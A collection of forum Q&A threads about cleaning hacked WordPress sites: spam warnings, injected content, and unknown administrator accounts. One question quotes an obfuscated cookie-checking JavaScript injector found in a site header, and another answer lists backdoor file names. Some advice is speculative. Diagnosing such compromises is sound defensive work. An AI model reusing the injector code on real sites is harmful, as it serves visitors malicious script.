I got an email this morning from google search console about 'Social Engineering Content Detected on Your Site' and they link the sent is something like this http://****.co[.]uk/~bettingb/
The website is WordPress website and I searched for the link in my files and database and I only found it in wordfence table wp_wfHits.
Is it possible that google crawled that link from this table?
is this something serious?
Any advice?
Before you act upon cjmling's advice, wp_wfHits is a legitimate table created by Wordfence (a security plugin).
As shown here
The fact that it is in this table means that Wordfence has noticed it, which is exactly what you want. I cannot imagine that this is the only place in the database that has this but it may be encoded elsewhere.
The other thing is that Wordfence may have already cleaned up the issue between Google spotting it and you looking into it. I would let Search Console run again and see if it is found again.
DO NOT think that your site has been fully compromised, change any admin passwords but you'll probably find that it was stuff added as a comment to a post (usual WordPress "hack")
Also, if you really want to be secure, change the database prefix (Wordfence I think has this option out the box) which means you are then not using the standard "wp_" prefix and you can spot things easier!
Related
The website is a wordpress site and it was been attacked by xss attack. Ive already installed wordfence and malcare to scan and remove the malicious code and files. but still the google search results are show spam links under the main result. I most of the pages direct to 404 webpages and i was told the google bot will remove it automatically but the issue still remains after 4 days. if any expert regarding this have any solutions and advice i would much appreciate.
You can try resubmitting you sitemap to Google in the Search Console.
Otherwise, similiarly try using the Google Removals tool to temporarily these links, hopefully the will be cleared from the search results by the the time the links are restored.
Tutorial: https://support.google.com/webmasters/answer/9689846?hl=en
I made a couple of wordpress database backups before making some adjustments on a site. Found some new problems, so I checked my work to see if a new problem was something I'd done, or if it wasn't correctly handled on the original site...I did this by opening up the original backup sql file and searching for a word, and saw a whole bunch of inappropriate verbiage in the file. Stuff that has nothing to do with the content of the website. Possibly inflammatory sentences involving politics which I know the site owners would never have put there (they are a retail site).
I ran some checks to see whether or not the site had MalWare, and the software didn't see any warnings.
I checked the pages, posts, and comments on the site, and do not see anything from the sql files on the site itself. The site owners had mentioned in passing that they'd had a site break-in previously. I assumed it had been cleaned up.
Does the stuff that I found in their sql file prove that it hasn't been cleaned up?
What are the best steps to remove that material without breaking the site?
And does this material being in the db negatively impacted their SEO?
Your thoughts and advice much appreciated.
1) Does the stuff that I found in their sql file prove that it hasn't been cleaned up?
Not necessarily. The owners may have overwritten posts or restored previous revisions and the bad content you are seeing may actually be in post revisions - which would not be visible.
To verify this: Login to your hosting account, open phpmyadmin, select the database for this website, click the SQL tab and run this query:
SELECT `ID`, `post_content` FROM `wp_posts` WHERE `post_type` = "revision"
If you see the bad content in the results then what you saw in the SQL file was likely from the revisions.
2) What are the best steps to remove that material without breaking the site?
There are plugins to delete old revisions. See here: https://wordpress.org/plugins/search/delete+revisions/ or (if you are comfortable with doing this) you can directly delete them from the database. Just make sure you backup first!
3) And does this material being in the db negatively impacted their SEO?
Old revisions should not be crawled by search engines and should have no impact on SEO.
I have newly installed WordPress copy on my live server but on google search it show
"this site might be hacked "
message under my site link. i have applied the search console verification method of uploading html file into root folder but this error is not gone. checked into Security options tab it shows "content injection" spam issue with my site but i have not found any accurate method to solve that issue .
Carefully follow FAQ - My Site Was Hacked - WordPress Codex.
Then take a look at the recommended security measures in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex
Change all passwords. Scan your own PC. Tell your web host you got hacked; and consider changing to a more secure host: Recommended WordPress Web Hosting
You might find this page valuable, it seems to be talk specifically to the problem you are referring to with the warning: How to Remove Google Blacklist Warnings
This warning seems to be specific to SEO spam. From what I understand there are many different things that might be contributing to this. I think if you do a Fetch as Google via the console you should see exactly what Google is seeing. These Sercuri folks seem to have another guide that might help you too: How to Clean a WordPress Hack
Good luck, keep us posted
My apologies in advance if I am posting it in the wrong forum.
I have a WordPress site. Every couple of days, a new user is added as an "Administrator" as shown below
I have changed my password many times using complex passwords but to no use. I even searched on Google and have read links like this one.
I have also unchecked the option "Anyone can register"
However, I am unable to stop them from registering.
Fortunately, no malicious activity has been noticed (Ex: Deletions/Unwanted posts etc)
Please advise me on what I can do to stop these?
You clearly have a more serious compromise, like an uploaded malicious script or an unpatched vulnerability. You need to rebuild your site from scratch (clean install of the current versions of WP and any plugins and themes, using a known-good database export) ASAP before something really bad happens.
Unfortunately, it's impossible to say what happened without digging through your server. My guess is that somebody exploited a vulnerability and uploaded a script. It could be anything - an hole in the WP core, a plugin, or a theme; a malicious plugin or theme; a stolen password; a breach of another site on the same server; or a number of other things.
Regardless of what happened, the only safe fix is to rebuild the site. If you have data backups, you can achieve this in a few hours.
I strongly recommend installing the security plugin WordFence to help prevent similar problems in the future. (I have no affiliation with WordFence, but use it on a number of sites.)
Finally, you might want to read this discussion on security.stackexchange.com. The consensus in this situation is "nuke it from orbit." Good luck!
Someone is making a SQL injection in your site.
If you want to prevent this in future, you should do some things.
Rebuild your website from scratch.
Install some of the security plugins, like Bulletproof Security, Wordfence, iThemes Security. I suggest you to buy the license of Bulletproof, or use the free version + one of the others. And be careful for the equal settings.
The most common attack are with SQL Injection XSS, Plugin exploits and of course brute-forcing the admin pass. You should upgrade every plugin and Wordpress every time when you see a new version.
Use less plugins. They are one of the main reason for hacked websites. If you use Linux, Ican tell you how to scan your website for vulnerabilities. Or just tell me the url, and I will tell you the results.
Also change your /wp-admin path, there are a lot of bots who search the web and make bruteforce attacks.
Also is important to use different admin username from admin or Admin. And use strong passwords. It's a good practice when you make a new Wordpress installation, to do two more users. The first will be an Author and will post everything in the site, the second you should make with Administration role. After that delete the first admin user and start the new one.
Hackers knows that almost every time the user with id:1 is the admin, so they can try to access again. So in this case your admin will be with id:3, and again don't use username like admin and etc.
Best regards and wish you luck.
Kasmetski
Check index.php, wp-admin/index.php to see if they have been modified. Usually the following line of code is added to the top of the index.php file. A code starting with 'required' is usually added.
The file being ‘required’/’included’ here contains malicious code which is executed along with each run of WordPress. Such code can generate fake pharma pages, Japanese SEO spam pages and other malware infections.
Delete the #require code from the file after comparing it with the contents of the core WP files from it’s GitHub repository.
Check if there are any new files in the root of the server or /wp-admin folder that were not created by you. Some of the files that you may find are:
Marvins.php
db_.php
8c18ee
83965
admin.php
buddy.zip
dm.php
If you find any of the above suspicious files, take a backup and delete them.
Source: https://www.getastra.com/blog/911/fix-wordpress-admin-dashboard-wp-admin-hack/
I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
That URL at the the end is super suspicious. I googled but found no leads :-(
I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.
Does anyone have any knowledge of this?
That looks strange to me. Maybe try reinstalling wordpress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the google analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer then 8 letters. If your site is infected, take it down from the web NOW until your sure it's not.